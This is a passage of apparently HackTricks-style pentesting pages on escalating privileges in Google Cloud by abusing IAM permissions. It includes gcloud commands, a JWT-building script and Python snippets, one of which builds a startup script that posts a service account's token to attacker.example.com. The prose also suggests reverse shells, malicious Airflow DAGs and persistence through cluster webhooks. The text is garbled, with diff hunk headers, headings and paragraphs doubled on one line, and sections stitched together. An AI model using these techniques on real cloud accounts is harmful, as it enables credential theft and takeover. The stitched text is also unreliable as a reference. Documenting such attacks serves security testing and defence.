GCP, as any other cloud, has some **principals**: users, groups and service accounts, and some **resources** like compute engine, cloud functions…\
Then, via roles, **permissions are granted to those principals over the resources**. This is the way to specify the permissions a principal has over a resource in GCP.\
@@ -41,7 +39,7 @@ It's important to note also that in **GCP Service Accounts are both principals a

The permissions in parentheses indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API.
{% endhint %}
# Privilege Escalation to Principals

Check all the **known permissions** that will allow you to **escalate privileges over other principals** in:
@@ -49,7 +47,7 @@ Check all the **known permissions** that will allow you to **escalate privileges

[gcp-privesc-to-other-principals.md](gcp-privesc-to-other-principals.md)
{% endcontent-ref %}
# Privilege Escalation to Resources

Check all the **known permissions** that will allow you to **escalate privileges over other resources** in:
@@ -57,7 +55,7 @@ Check all the **known permissions** that will allow you to **escalate privileges

[gcp-privesc-to-resources.md](gcp-privesc-to-resources.md)
{% endcontent-ref %}
#
<details>
View file
@@ -17,16 +17,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

</details>
# GCP - Privesc to other Principals
{% hint style="info" %}
GCP has **hundreds of permissions**. This is just a list containing the **known** ones that could allow you to escalate to other principals.\
If you know about any other permissions not mentioned here, **please send a PR to add it** or let me know and I will add it.
{% endhint %}
# IAM

## iam.roles.update (iam.roles.get)

If you have the mentioned permissions you will be able to update a role assigned to you and give yourself extra permissions to other resources like:
@@ -36,13 +34,13 @@ gcloud iam roles update <role name> --project <project> --add-permissions <permi
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](gcp-privesc-to-other-principals.md#deploymentmanager) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
## iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)

This permission allows you to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours.

You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
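Under the hood this maps to the IAM Credentials `generateAccessToken` endpoint. A minimal sketch, where the Service Account name is a hypothetical placeholder and `$TOKEN` stands for the access token you already hold (the request itself is left commented out):

```bash
TARGET_SA="victim-sa@project-id.iam.gserviceaccount.com"   # hypothetical target SA
URL="https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/${TARGET_SA}:generateAccessToken"
BODY='{"scope":["https://www.googleapis.com/auth/cloud-platform"]}'
echo "$URL"
# curl -s -X POST "$URL" -H "Authorization: Bearer $TOKEN" \
#      -H "Content-Type: application/json" -d "$BODY"
```

With `gcloud`, the equivalent is `gcloud auth print-access-token --impersonate-service-account=<SA>`.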
## iam.serviceAccountKeys.create

This permission allows us to do something similar to the previous method, but instead of an access token, we are **creating a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account.
@@ -54,7 +52,7 @@ You can find a script to automate the [**creation, exploit and cleaning of a vul

Note that **iam.serviceAccountKeys.update won't work to modify the key** of a SA because to do that the permission iam.serviceAccountKeys.create is also needed.

## iam.serviceAccounts.implicitDelegation
If you have the _**iam.serviceAccounts.implicitDelegation**_** permission on a Service Account** that has the _**iam.serviceAccounts.getAccessToken**_** permission on a third Service Account**, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain.
@@ -64,19 +62,19 @@ You can find a script to automate the [**creation, exploit and cleaning of a vul

Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method.

## iam.serviceAccounts.signBlob
The _iam.serviceAccounts.signBlob_ permission “allows signing of arbitrary payloads” in GCP. This means we can **create an unsigned JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).

You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
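A minimal sketch of the unsigned JWT you would assemble before asking signBlob/signJwt for its signature. The SA, audience and timestamps are illustrative placeholders, and only the local string assembly is shown (no API call):

```bash
b64url() { base64 | tr '+/' '-_' | tr -d '=\n'; }    # base64url without padding

SA="victim-sa@project-id.iam.gserviceaccount.com"    # hypothetical target SA
IAT=1700000000; EXP=$((IAT + 3600))                  # fixed times for the example

HEADER=$(printf '{"alg":"RS256","typ":"JWT"}' | b64url)
CLAIMS=$(printf '{"iss":"%s","aud":"https://oauth2.googleapis.com/token","scope":"https://www.googleapis.com/auth/cloud-platform","iat":%d,"exp":%d}' "$SA" "$IAT" "$EXP" | b64url)

# This header.claims string is the payload whose signature you request
UNSIGNED_JWT="${HEADER}.${CLAIMS}"
echo "$UNSIGNED_JWT"
```

Once you append the returned signature (`header.claims.signature`), the JWT can be exchanged for an access token at `https://oauth2.googleapis.com/token` using the `urn:ietf:params:oauth:grant-type:jwt-bearer` grant.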
## iam.serviceAccounts.signJwt

Similar to how the previous method worked by signing arbitrary payloads, this method works by signing well-formed JSON web tokens (JWTs). The difference with the previous method is that **instead of making google sign a blob containing a JWT, we use the signJWT method that already expects a JWT**. This makes it easier to use, but you can only sign JWTs instead of arbitrary bytes.

You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### iam.serviceAccounts.setIamPolicy <a href="#iam.serviceaccounts.setiampolicy" id="iam.serviceaccounts.setiampolicy"></a> ## iam.serviceAccounts.setIamPolicy <a href="#iam.serviceaccounts.setiampolicy" id="iam.serviceaccounts.setiampolicy"></a>
This permission allows to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the “roles/iam.serviceAccountTokenCreator” role over the interesting SA: This permission allows to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the “roles/iam.serviceAccountTokenCreator” role over the interesting SA:
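As a sketch (all account emails below are placeholders), the binding can be added with `gcloud` and then used to impersonate the victim SA:

```shell
# Grant ourselves token-creator over the victim SA
gcloud iam service-accounts add-iam-policy-binding \
    "victim-sa@target-project.iam.gserviceaccount.com" \
    --member="user:attacker@example.com" \
    --role="roles/iam.serviceAccountTokenCreator"

# Now we can mint access tokens as the victim SA
gcloud auth print-access-token \
    --impersonate-service-account="victim-sa@target-project.iam.gserviceaccount.com"
```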
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**

## iam.serviceAccounts.actAs

This means that as part of creating certain resources, you must “actAs” the Service Account for the call to complete successfully. For example, when starting a new Compute Engine instance with an attached Service Account, you need _iam.serviceAccounts.actAs_ on that Service Account. This is because without that permission, users could escalate permissions with fewer permissions to start with.

**There are multiple individual methods that use _iam.serviceAccounts.actAs_, so depending on your own permissions, you may only be able to exploit one (or more) of these methods below**. These methods are slightly different in that they **require multiple permissions to exploit, rather than a single permission** like all of the previous methods.

## iam.serviceAccounts.getOpenIdToken

This permission can be used to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource.
You can find an example of how to create an OpenID token on behalf of a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py).
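A quick sketch with `gcloud` (SA email and audience URL are placeholders — the audience should be the service you want to present the token to):

```shell
# Mint an OpenID (identity) token for the victim SA
gcloud auth print-identity-token \
    --impersonate-service-account="victim-sa@target-project.iam.gserviceaccount.com" \
    --audiences="https://my-cloud-run-service-xyz-uc.a.run.app"
```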
# resourcemanager

## resourcemanager.organizations.setIamPolicy

Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at the **organization** level. So, you can follow the same exploitation example.

## resourcemanager.folders.setIamPolicy

Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at the **folder** level. So, you can follow the same exploitation example.

## resourcemanager.projects.setIamPolicy

Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at the **project** level. So, you can follow the same exploitation example.
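A sketch of the project-level case (project ID, member and role are placeholders; the equivalent `gcloud organizations add-iam-policy-binding` and `gcloud resource-manager folders add-iam-policy-binding` commands exist for the other two levels):

```shell
# Grant ourselves a privileged role over the whole project
gcloud projects add-iam-policy-binding target-project \
    --member="user:attacker@example.com" \
    --role="roles/owner"
```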
# deploymentmanager

## deploymentmanager.deployments.create

This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could, for example, launch a compute instance with a SA to escalate to it.
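A minimal sketch of such a deployment (project, zone, SA email and resource names are placeholders, not tested against every API version):

```shell
# config.yaml: a deployment that spawns a VM running as the victim SA
cat > config.yaml <<'EOF'
resources:
- name: privesc-vm
  type: compute.v1.instance
  properties:
    zone: us-central1-a
    machineType: https://www.googleapis.com/compute/v1/projects/target-project/zones/us-central1-a/machineTypes/e2-micro
    disks:
    - deviceName: boot
      boot: true
      autoDelete: true
      initializeParams:
        sourceImage: projects/debian-cloud/global/images/family/debian-11
    networkInterfaces:
    - network: global/networks/default
      accessConfigs:
      - type: ONE_TO_ONE_NAT
    serviceAccounts:
    - email: victim-sa@target-project.iam.gserviceaccount.com
      scopes:
      - https://www.googleapis.com/auth/cloud-platform
EOF

gcloud deployment-manager deployments create privesc-deploy --config config.yaml
```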
In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) the following [**script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance; however, that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.**

## deploymentmanager.deployments.**update**

This is like the previous abuse, but instead of creating a new deployment, you modify an already existing one (so be careful).

Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.**

## deploymentmanager.deployments.**setIamPolicy**

This is like the previous abuse, but instead of directly creating a new deployment, you first grant yourself that access and then abuse the permission as explained in the previous _deploymentmanager.deployments.create_ section.
# cloudbuild

## cloudbuild.builds.create

With this permission you can **submit a cloud build**. The cloudbuild machine will have in its filesystem by **default a token of the powerful cloudbuild Service Account**: `<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com`. However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
Therefore, you can just make the machine exfiltrate the token to your server or **get a reverse shell inside of it and grab the token yourself** (the file containing the token might change).
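A sketch of the token-exfiltration variant (the exfil URL is a placeholder; a `serviceAccount:` field in the config can be used to pick a different SA):

```shell
# cloudbuild.yaml: one step that reads the build SA token from the metadata
# server and posts it to a server we control
cat > cloudbuild.yaml <<'EOF'
steps:
- name: gcr.io/cloud-builders/gcloud
  entrypoint: bash
  args:
  - -c
  - >
    curl -s -H "Metadata-Flavor: Google"
    "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
    | curl -s -X POST -d @- https://attacker.example.com/exfil
EOF

gcloud builds submit --no-source --config cloudbuild.yaml
```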
For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)

## cloudbuild.builds.update

**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was done with the previous permission (but unfortunately, at the time of this writing, I couldn't find any way to call that API).
# compute

## compute.projects.setCommonInstanceMetadata

With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the instance is running with.\
Limitations:
For more information about how to exploit this permission check:

{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}
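A sketch of the metadata abuse (username and key file are placeholders; note that setting the `ssh-keys` key this way replaces the existing project-wide value, so you may want to append to the current keys instead):

```shell
# Add our public key to the project-wide SSH keys
echo "attacker:$(cat attacker_key.pub)" > ssh_keys.txt
gcloud compute project-info add-metadata \
    --metadata-from-file ssh-keys=ssh_keys.txt
```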
## compute.instances.setMetadata

This permission gives the **same privileges as the previous permission** but over specific instances instead of a whole project. The **same exploits and limitations apply**.

## compute.instances.setIamPolicy

This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.

## **compute.instances.osLogin**

If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance.

## **compute.instances.osAdminLogin**

If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance.
# container

## container.clusters.get

This permission allows you to **gather credentials for the Kubernetes cluster** using something like:
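For example (cluster name and zone are placeholders):

```shell
# Populate ~/.kube/config for the target cluster
gcloud container clusters get-credentials target-cluster --zone us-central1-a

# Then talk to the Kube-API with whatever RBAC the mapped identity has
kubectl get pods
```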
Note that **kubernetes clusters might be configured to be private**, which will disallow that access to the Kube-API server from the Internet.
{% endhint %}

## container.clusters.getCredentials

Apparently this permission might be useful to gather auth credentials (the basic auth method isn't supported by GKE anymore if you use the latest GKE versions).
## container.roles.escalate/container.clusterRoles.escalate

**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** than the ones the principal has. However, a **GCP** principal with those permissions will be **able to create/update Roles/ClusterRoles with more permissions** than the ones he holds, effectively bypassing the Kubernetes protection against this behaviour.

**container.roles.create** and/or **container.roles.update** OR **container.clusterRoles.create** and/or **container.clusterRoles.update** respectively are also **necessary** to perform those privilege escalation actions.\
## container.roles.bind/container.clusterRoles.bind

**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** than the ones the principal has. However, a **GCP** principal with those permissions will be **able to create/update RoleBindings/ClusterRoleBindings with more permissions** than the ones he has, effectively bypassing the Kubernetes protection against this behaviour.

**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively are also **necessary** to perform those privilege escalation actions.

## container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update

All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod, you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server**, allowing you to escalate to any service account.\
For more information check:
As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GCP** (by default the compute SA is used).
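The pod-creation case can be sketched like this (SA name, image and exfil URL are placeholders):

```shell
# A pod that runs as the target K8s SA and posts its token to our server
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: sa-token-stealer
spec:
  serviceAccountName: target-sa
  containers:
  - name: stealer
    image: curlimages/curl
    command: ["sh", "-c"]
    args:
    - curl -s -X POST -d @/var/run/secrets/kubernetes.io/serviceaccount/token https://attacker.example.com/exfil
EOF
```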
## container.secrets.get, container.secrets.list

As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#listing-secrets), with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them.

## container.pods.exec

With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but you will also be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**.
## container.pods.portForward

As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#port-forward), with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.**

## container.serviceAccounts.createToken

Because of the **name** of the **permission**, it **looks like it will allow you to generate tokens of the K8s Service Accounts**, so you would be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find one.

## container.mutatingWebhookConfigurations.create, container.mutatingWebhookConfigurations.update

These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\
For more information [**follow this link**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller).

# storage

## storage.hmacKeys.create

There is a feature of Cloud Storage, “interoperability”, that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**.
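A quick sketch (the SA email is a placeholder):

```shell
# Create an HMAC key for a higher-privileged SA; the returned access ID and
# secret can then be used with S3-style tooling against Cloud Storage
gsutil hmac create victim-sa@target-project.iam.gserviceaccount.com
```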
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).

## storage.objects.get

This permission allows you to **download files stored inside GCP Storage**. This will potentially allow you to escalate privileges because on some occasions **sensitive information is saved there**. Moreover, some GCP services store their information in buckets:

* **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code.
* **GCR (Container Registry)**: The **images** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**.
## storage.objects.create, storage.objects.delete

In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object\_permissions), you also need `storage.objects.delete` to **modify** an existing object.
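For example (bucket and object paths are placeholders):

```shell
# Overwriting an existing object needs both permissions, since the old
# version is deleted and a new one is created in its place
gsutil cp backdoored_script.py gs://victim-bucket/path/original_script.py
```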
Moreover, several GCP services also **store code inside buckets** that is later executed:
* **GCR (Container Registry)**: The **container images are stored inside buckets**. So if you have write access over them, you could **modify the images** and execute your own code whenever that container is used.
* The bucket used by GCR will have a URL similar to `gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com` (the top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).
## storage.objects.setIamPolicy

You can grant yourself the permissions needed to **abuse any of the previous scenarios of this section**.

# storage.objects Write permission

If you can modify or add objects in buckets you might be able to escalate your privileges to other resources that are using the bucket to store code that they execute.

## Composer

**Composer** is **Apache Airflow** managed inside GCP. It has several interesting features:
* It stores the **code in a bucket**, therefore, **anyone with write access over that bucket** is going to be able to change/add DAG code (the code Apache Airflow will execute)\
Then, if you have **write access over the bucket Composer is using** to store the code you can **privesc to the SA running in the GKE cluster**.
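A sketch of the Composer abuse (environment name, location and bucket are placeholders):

```shell
# Find the bucket the environment loads DAGs from
gcloud composer environments describe target-env \
    --location us-central1 --format="get(config.dagGcsPrefix)"

# Drop a malicious DAG into it; Airflow will pick it up and execute it
gsutil cp evil_dag.py gs://us-central1-target-env-bucket/dags/
```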
# References

* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
</details>
# cloudfunctions

## cloudfunctions.functions.create,iam.serviceAccounts.actAs

For this method, we will be **creating a new Cloud Function with an associated Service Account** that we want to gain access to. Because Cloud Function invocations have **access to the metadata** API, we can request a token directly from it, just like on a Compute Engine instance.
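A sketch of the deployment (function name, source directory, runtime and SA email are placeholders; the function source should read the token from the metadata server and return it):

```shell
# Deploy a function that runs as the victim SA
gcloud functions deploy privesc-func \
    --runtime python39 --trigger-http --allow-unauthenticated \
    --source ./function_code --entry-point main \
    --service-account "victim-sa@target-project.iam.gserviceaccount.com"

# Invoke it to receive the victim SA's access token
gcloud functions call privesc-func
```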
The exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions). The exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions).
## cloudfunctions.functions.update,iam.serviceAccounts.actAs

Similar to _cloudfunctions.functions.create_, this method **updates (overwrites) an existing function instead of creating a new one**. The API used to update the function also allows you to **swap the Service Account if you have another one you want to get the token for**. The script will update the target function with the malicious code, wait for it to deploy, and finally invoke it to retrieve the Service Account's access token.
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).
# compute

## compute.instances.create,iam.serviceAccounts.actAs

This method **creates a new Compute Engine instance with a specified Service Account**, then **sends the token** belonging to that Service Account to an **external server.**
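A hedged sketch of the mechanism: the instance is created with a startup script that reads the token from the metadata server and POSTs it out. The exfiltration URL and script wording are placeholders, not the Rhino exploit script:

```python
# Illustrative: build the startup script a newly created instance would run
# to exfiltrate its Service Account token to an attacker-controlled server.
EXFIL_URL = "https://attacker.example.com/collect"  # placeholder/assumption

def build_startup_script(exfil_url: str) -> str:
    token_url = ("http://metadata.google.internal/computeMetadata/v1/"
                 "instance/service-accounts/default/token")
    return "\n".join([
        "#! /bin/bash",
        # The metadata server requires the Metadata-Flavor header.
        f'TOKEN=$(curl -s -H "Metadata-Flavor: Google" "{token_url}")',
        f'curl -s -X POST -d "$TOKEN" "{exfil_url}"',
    ])

# The script would then be attached at creation time, roughly:
#   gcloud compute instances create evil-vm \
#       --service-account [TARGET_SA] \
#       --metadata startup-script="$(python3 -c ...)"
```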
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py).
# run

## run.services.create,iam.serviceAccounts.actAs

Similar to the _cloudfunctions.functions.create_ method, this method creates a **new Cloud Run Service** that, when invoked, **returns the Service Account's** access token by accessing the metadata API of the server it is running on. A Cloud Run service will be deployed and a request can be performed to it to get the token.
This method uses an included Docker image that must be built and hosted to exploit it.
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage).
# Cloudscheduler

## cloudscheduler.jobs.create,iam.serviceAccounts.actAs

Cloud Scheduler allows you to set up cron jobs targeting arbitrary HTTP endpoints. **If that endpoint is a \*.googleapis.com endpoint**, then you can also tell Scheduler that you want it to authenticate the request **as a specific Service Account**, which is exactly what we want.
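A sketch of what such a job could look like, built as a `gcloud` invocation. The job name, target API call, and `policy.json` body are illustrative assumptions; the flag names follow the public `gcloud scheduler jobs create http` interface:

```python
# Illustrative: compose a Scheduler job that hits a *.googleapis.com endpoint
# authenticated as the target Service Account (via an OAuth token).
def build_scheduler_job_cmd(project: str, service_account: str) -> list:
    # Example target (assumption): set the project IAM policy in our favor.
    target = ("https://cloudresourcemanager.googleapis.com/v1/"
              f"projects/{project}:setIamPolicy")
    return [
        "gcloud", "scheduler", "jobs", "create", "http", "privesc-job",
        "--schedule", "* * * * *",                   # fire every minute
        "--uri", target,
        "--http-method", "POST",
        "--message-body-from-file", "policy.json",   # crafted request body
        "--oauth-service-account-email", service_account,
    ]
```

Scheduler then signs the request with the Service Account's identity, so the API call executes with its privileges, not yours.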
To escalate our privileges with this method, we just need to **craft the HTTP request we want to hit the target API with** and let Scheduler authenticate it as the target Service Account.
A similar method may be possible with Cloud Tasks, but we were not able to do it in our testing.
# orgpolicy

## orgpolicy.policy.set

This method does **not necessarily grant you more IAM permissions**, but it may **disable some barriers** that are preventing certain actions. For example, there is an Organization Policy constraint named _appengine.disableCodeDownload_ that prevents App Engine source code from being downloaded by users of the project. If this was enabled, you would not be able to download that source code, but you could use _orgpolicy.policy.set_ to disable the constraint and then continue with the source code download.
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
# serviceusage

The following permissions are useful to create and steal API keys. Note this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._

Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
## serviceusage.apiKeys.create

There is another method of authenticating with GCP APIs known as API keys. By default, they are created with no restrictions, which means they have access to the entire GCP project they were created in. We can capitalize on that fact by creating a new API key that may have more privileges than our own user. There is no official API for this, so a custom HTTP request needs to be sent to _https://apikeys.clients6.google.com/_ (or _https://apikeys.googleapis.com/_). This was discovered by monitoring the HTTP requests and responses while browsing the GCP web console. For documentation on the restrictions associated with API keys, visit [this link](https://cloud.google.com/docs/authentication/api-keys).
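Since the endpoint is undocumented, the exact request shape is not guaranteed; as a hedged sketch, the request the console-style traffic suggests looks roughly like this (the path is an assumption for illustration, and an OAuth access token is still required):

```python
# Illustrative only: build the URL for the undocumented API-key-creation
# endpoint described above. The /v1/projects/.../apiKeys path is an
# assumption; authenticate with your own token, e.g.
#   Authorization: Bearer $(gcloud auth print-access-token)
def build_apikey_create_url(project_number: str,
                            host: str = "apikeys.clients6.google.com") -> str:
    return f"https://{host}/v1/projects/{project_number}/apiKeys"

# A POST to this URL (empty body) would ask Google to mint a new,
# unrestricted API key in the target project.
```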
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.create.py).
## serviceusage.apiKeys.list

Another undocumented API was found for listing API keys that have already been created (this can also be done in the web console). Because you can still see the API key's value after its creation, we can pull all the API keys in the project.
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py).
# apikeys

The following permissions are useful to create and steal API keys. Note this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._

Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
## apikeys.keys.create <a href="#apikeys.keys.create" id="apikeys.keys.create"></a>

This permission allows you to **create an API key**.
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/b-apikeys.keys.create.sh).
## apikeys.keys.getKeyString,apikeys.keys.list <a href="#apikeys.keys.getkeystringapikeys.keys.list" id="apikeys.keys.getkeystringapikeys.keys.list"></a>

These permissions allow you to **list all the API keys and get the key string of each one**.
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh).
